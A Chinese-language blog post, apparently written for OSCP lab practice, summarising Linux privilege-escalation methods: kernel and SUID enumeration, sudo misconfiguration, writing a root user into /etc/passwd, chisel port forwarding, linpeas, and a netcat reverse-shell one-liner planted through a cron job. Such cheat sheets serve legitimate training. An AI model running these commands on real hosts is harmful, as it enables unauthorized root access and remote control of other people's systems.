Linux提权套路

民生   2024-07-15 14:50   海南  

 提权总结


    看到了,关注一下不吃亏啊,点个赞转发一下啦,WP看不下去的,可以B站搜:标松君,UP主录的打靶视频,欢迎关注。顺便宣传一下星球:重生者安全, 里面每天会不定期更新OSCP知识点,车联网渗透红队以及漏洞挖掘工具等信息分享,欢迎加入;以及想挖SRC逻辑漏洞的朋友,可以私聊。





01



提权思路


1.内核提权:查看系统内核版本后,根据版本号查找CVE提取常用命令:cat /etc/issuecat /etc/os-releaseuname -a
2.SUID提取常用命令和网站:find / -perm -u=s -type f 2>/dev/nullhttps://gtfobins.github.io/
3.计划任务提权写入计划任务的反弹shellecho "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ip port >/tmp/f"常用工具:https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64

4.查找ROOT权限文件并且其他用户有写入的权限:find / -user root -type f -perm -o=rw -ls 2>/dev/null | grep -v "/proc"比如/etc/passwd有权限写入,可以直接写入一个root用户进行提权
5.sudo错误配置提权常用命令:sudo -l
6.注意靶机只对本地开放的端口,比如127.0.0.18000或者127.0.0.18080这个时候需要我们去把靶机本地的端口转发到kali上面:可以使用chisel工具进行转发:kali上./chisel_kali server -p 8000 --reverse 靶机上:./chisel client 192.168.32.173:8000 R:8001:127.0.0.1:8000#这是将靶机的8000端口转发到kali的8001端口,这样直接访问kali的8001就可以了

7.常用自动化工具linpeas提权脚本:https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
















更多精彩内容请扫码关注“重生者安全”星球

免责声明:

本人所有文章均为技术分享,均用于防御为目的的记录,所有操作均在实验环境下进行,请勿用于其他用途,否则后果自负。

第二十七条:任何个人和组织不得从事非法侵入他人网络、干扰他人网络正常功能、窃取网络数据等危害网络安全的活动;不得提供专门用于从事侵入网络、干扰网络正常功能及防护措施、窃取网络数据等危害网络安全活动的程序和工具;明知他人从事危害网络安全的活动,不得为其提供技术支持、广告推广、支付结算等帮助

第十二条:  国家保护公民、法人和其他组织依法使用网络的权利,促进网络接入普及,提升网络服务水平,为社会提供安全、便利的网络服务,保障网络信息依法有序自由流动。

任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得危害网络安全,不得利用网络从事危害国家安全、荣誉和利益,煽动颠覆国家政权、推翻社会主义制度,煽动分裂国家、破坏国家统一,宣扬恐怖主义、极端主义,宣扬民族仇恨、民族歧视,传播暴力、淫秽色情信息,编造、传播虚假信息扰乱经济秩序和社会秩序,以及侵害他人名誉、隐私、知识产权和其他合法权益等活动。

第十三条:  国家支持研究开发有利于未成年人健康成长的网络产品和服务,依法惩治利用网络从事危害未成年人身心健康的活动,为未成年人提供安全、健康的网络环境。





道玄网安驿站
本号主推OSCP,vulnhub,车联网,红蓝对抗,挖洞,网络新闻等网络安全信息,喜欢的可以关注
 最新文章